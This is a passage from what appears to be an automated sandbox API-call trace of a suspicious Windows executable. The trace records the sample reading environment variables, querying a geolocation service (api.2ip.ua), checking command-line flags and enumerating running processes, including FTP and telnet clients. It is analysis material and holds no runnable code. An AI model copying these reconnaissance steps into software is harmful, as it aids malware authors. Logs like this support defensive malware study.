(HeapHandle=0x2c0000, Flags=0x8, Size=0x29) returned 0x2db200 [0149.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x2db200, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0149.892] GetLastError () returned 0x0 [0149.892] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1468) returned 0x7c [0149.892] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1468, Size=0x80) returned 0x2e1468 [0149.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0149.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x15) returned 0x2e13f0 [0149.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x2e13f0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0149.892] GetLastError () returned 0x0 [0149.892] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1468) returned 0x80 [0149.892] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1468, Size=0x84) returned 0x2e1468 [0149.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0149.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1e) returned 0x2df028 [0149.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x2df028, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0149.892] GetLastError () returned 0x0 [0149.892] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1468) returned 0x84 [0149.892] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1468, Size=0x88) returned 0x2e1468 [0149.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0149.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2a) returned 0x2db238 [0149.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x2db238, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0149.893] GetLastError () returned 0x0 [0149.893] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1468) returned 0x88 [0149.893] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1468, Size=0x8c) returned 0x2e1468 [0149.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0149.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x12) returned 0x2e1410 [0149.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x2e1410, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0149.893] GetLastError () returned 0x0 [0149.893] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1468) returned 0x8c [0149.893] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1468, Size=0x90) returned 0x2e1468 [0149.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0149.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x18) returned 0x2e1500 [0149.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x2e1500, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0149.893] GetLastError () returned 0x0 [0149.893] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1468) returned 0x90 [0149.893] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1468, Size=0x94) returned 0x2e1520 [0149.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0149.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x46) returned 0x2d6c90 [0149.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x2d6c90, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0149.893] GetLastError () returned 0x0 [0149.893] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1520) returned 0x94 [0149.893] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1520, Size=0x98) returned 0x2e1520 [0149.893] GetLastError () returned 0x0 [0149.893] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0ee0) returned 0x80 [0149.894] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0ee0) returned 0x80 [0149.894] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0ee0) returned 0x80 [0149.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8ec) returned 0x2e15c0 [0149.894] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0ee0) returned 0x80 [0149.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2de700 [0149.894] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0ee0) returned 0x80 [0149.895] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0ee0) returned 0x80 [0149.895] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0ee0) returned 0x80 [0149.896] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0ee0) returned 0x80 [0149.896] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0149.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2d53c0 [0149.972] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0156.576] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18b588, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18dd88 | out: lpBuffer=0x18b588*, lpdwNumberOfBytesRead=0x18dd88*=0x1df) returned 1 [0156.577] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0156.579] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0156.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ec648 [0156.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x353ec58 [0156.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x353ec58 | out: hHeap=0x2c0000) returned 1 [0156.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec648 | out: hHeap=0x2c0000) returned 1 [0156.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d53c0 | out: hHeap=0x2c0000) returned 1 [0156.579] GetCurrentProcess () returned 0xffffffff [0156.579] GetLastError () returned 0x2 [0156.580] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0156.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x304cf8 [0156.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8ec) returned 0x3557638 [0156.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x30e118 [0156.580] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30e118, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\onb5h0yx46mrevq4.exe")) returned 0x3a [0156.580] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0156.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x35493e8 [0156.580] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe\" --Admin IsNotAutoStart IsNotTask" [0156.580] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18de68 | out: pNumArgs=0x18de68) returned 0x389ef0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" [0156.580] lstrcpyW (in: lpString1=0x18eaf8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" [0156.580] lstrcmpW (lpString1="IsAutoStart", lpString2="IsNotAutoStart") returned -1 [0156.580] lstrcmpW (lpString1="IsTask", lpString2="IsNotTask") returned 1 [0156.581] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe\" --Admin IsNotAutoStart IsNotTask" [0156.581] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18de04 | out: pNumArgs=0x18de04) returned 0x389ef0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" [0156.581] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe") returned="OnB5h0yX46mreVq4.exe" [0156.581] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0156.582] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcesses") returned 0x0 [0156.582] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcessModules") returned 0x0 [0156.582] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleBaseNameW") returned 0x0 [0156.582] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x77060000 [0156.583] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcesses") returned 0x77061544 [0156.583] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0156.584] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameW") returned 0x7706152c [0156.584] EnumProcesses (in: lpidProcess=0x183600, cb=0xa000, lpcbNeeded=0x18de10 | out: lpidProcess=0x183600, lpcbNeeded=0x18de10) returned 1 [0156.591] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0156.591] CloseHandle (hObject=0x0) returned 0 [0156.591] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0156.591] CloseHandle (hObject=0x0) returned 0 [0156.591] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0156.591] CloseHandle (hObject=0x0) returned 0 [0156.591] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0156.591] CloseHandle (hObject=0x0) returned 0 [0156.591] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0156.591] CloseHandle (hObject=0x0) returned 0 [0156.591] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0156.591] CloseHandle (hObject=0x0) returned 0 [0156.591] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0156.591] CloseHandle (hObject=0x0) returned 0 [0156.591] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0156.591] CloseHandle (hObject=0x0) returned 0 [0156.591] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0156.591] CloseHandle (hObject=0x0) returned 0 [0156.592] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0156.592] CloseHandle (hObject=0x0) returned 0 [0156.592] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0156.592] CloseHandle (hObject=0x0) returned 0 [0156.592] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0156.592] CloseHandle (hObject=0x0) returned 0 [0156.592] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0156.592] CloseHandle (hObject=0x0) returned 0 [0156.592] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0156.592] CloseHandle (hObject=0x0) returned 0 [0156.592] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0156.592] CloseHandle (hObject=0x0) returned 0 [0156.592] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0156.592] CloseHandle (hObject=0x0) returned 0 [0156.592] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x0 [0156.592] CloseHandle (hObject=0x0) returned 0 [0156.592] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0156.592] CloseHandle (hObject=0x0) returned 0 [0156.592] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x554 [0156.592] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 0 [0156.593] CloseHandle (hObject=0x554) returned 1 [0156.593] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x554 [0156.593] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 0 [0156.593] CloseHandle (hObject=0x554) returned 1 [0156.593] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x47c) returned 0x0 [0156.593] CloseHandle (hObject=0x0) returned 0 [0156.593] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0 [0156.593] CloseHandle (hObject=0x0) returned 0 [0156.593] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x554 [0156.593] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 0 [0156.593] CloseHandle (hObject=0x554) returned 1 [0156.593] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x554 [0156.593] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 0 [0156.593] CloseHandle (hObject=0x554) returned 1 [0156.593] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x78c) returned 0x554 [0156.594] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.595] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xd60000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="chi.exe") returned 0x7 [0156.595] CloseHandle (hObject=0x554) returned 1 [0156.595] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x60c) returned 0x554 [0156.595] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.596] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x310000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="amp.exe") returned 0x7 [0156.596] CloseHandle (hObject=0x554) returned 1 [0156.596] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x20c) returned 0x554 [0156.597] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.598] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xe10000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="sherman-nomination.exe") returned 0x16 [0156.598] CloseHandle (hObject=0x554) returned 1 [0156.598] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x240) returned 0x554 [0156.598] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.599] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x8b0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="checking_integration_majority.exe") returned 0x21 [0156.599] CloseHandle (hObject=0x554) returned 1 [0156.599] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x79c) returned 0x554 [0156.599] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.601] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x250000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="frcarefultypical.exe") returned 0x14 [0156.601] CloseHandle (hObject=0x554) returned 1 [0156.601] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c4) returned 0x554 [0156.601] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.602] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x1170000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="ec_lessons.exe") returned 0xe [0156.602] CloseHandle (hObject=0x554) returned 1 [0156.602] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x798) returned 0x554 [0156.602] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.603] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xa50000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="homeland-used.exe") returned 0x11 [0156.604] CloseHandle (hObject=0x554) returned 1 [0156.604] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x488) returned 0x554 [0156.604] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.605] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xe60000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="shipped_hormone.exe") returned 0x13 [0156.605] CloseHandle (hObject=0x554) returned 1 [0156.605] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7d0) returned 0x554 [0156.605] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.606] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xf0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="cambridge knowing.exe") returned 0x15 [0156.607] CloseHandle (hObject=0x554) returned 1 [0156.607] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a4) returned 0x554 [0156.607] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.608] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x1390000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="maritime institutional.exe") returned 0x1a [0156.608] CloseHandle (hObject=0x554) returned 1 [0156.608] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x774) returned 0x554 [0156.608] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.609] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x1f0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="conditioning-surf-detection.exe") returned 0x1f [0156.610] CloseHandle (hObject=0x554) returned 1 [0156.610] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7f4) returned 0x554 [0156.610] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.611] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xc90000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="muscles.exe") returned 0xb [0156.611] CloseHandle (hObject=0x554) returned 1 [0156.611] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7dc) returned 0x554 [0156.611] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.613] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xc00000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="mark drugs.exe") returned 0xe [0156.613] CloseHandle (hObject=0x554) returned 1 [0156.613] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x48c) returned 0x554 [0156.613] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.614] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xf10000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="anybody.exe") returned 0xb [0156.614] CloseHandle (hObject=0x554) returned 1 [0156.614] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5cc) returned 0x554 [0156.615] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.616] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xcf0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="borders-connected.exe") returned 0x15 [0156.616] CloseHandle (hObject=0x554) returned 1 [0156.616] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x554 [0156.616] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.617] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x1180000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0156.617] CloseHandle (hObject=0x554) returned 1 [0156.617] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x318) returned 0x554 [0156.617] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.619] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xa40000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0156.619] CloseHandle (hObject=0x554) returned 1 [0156.619] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c0) returned 0x554 [0156.619] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.620] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xf20000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0156.620] CloseHandle (hObject=0x554) returned 1 [0156.620] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x664) returned 0x554 [0156.620] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.622] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xab0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0156.622] CloseHandle (hObject=0x554) returned 1 [0156.622] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a8) returned 0x554 [0156.622] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.624] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x120000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0156.624] CloseHandle (hObject=0x554) returned 1 [0156.624] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x308) returned 0x554 [0156.624] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.625] GetModuleBaseNameW (in: 